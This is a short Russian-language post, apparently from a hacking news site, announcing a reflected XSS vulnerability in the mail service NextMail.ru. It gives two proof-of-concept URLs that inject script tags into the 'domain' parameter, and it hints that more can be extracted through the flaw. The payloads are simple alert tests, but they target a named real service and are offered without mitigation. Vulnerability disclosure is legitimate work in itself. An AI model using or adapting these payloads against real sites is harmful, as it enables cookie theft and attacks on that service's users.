XSS-уязвимость на NextMail.ru

Сегодня на очень популярном почтовике NextMail.ru (на котором находится почта @xaker.ru, @russian.ru, @dezigner.ru, @programist.ru) была обнаружена XSS-уязвимость.
Вариант без фильтрации кавычек:
http://www.nextmail.ru/?m=accountmissing&domain=[script]alert()[/script]
Еще один, но уже с фильтрацией:
http://www.nextmail.ru/?m=accountmissing&domain=[script]alert(/hi/)[/script]
Из уязвимости можно довольно много всего интересного выбить при желании. Найдена _t0x1n_’ом.

Источник: Web-Hack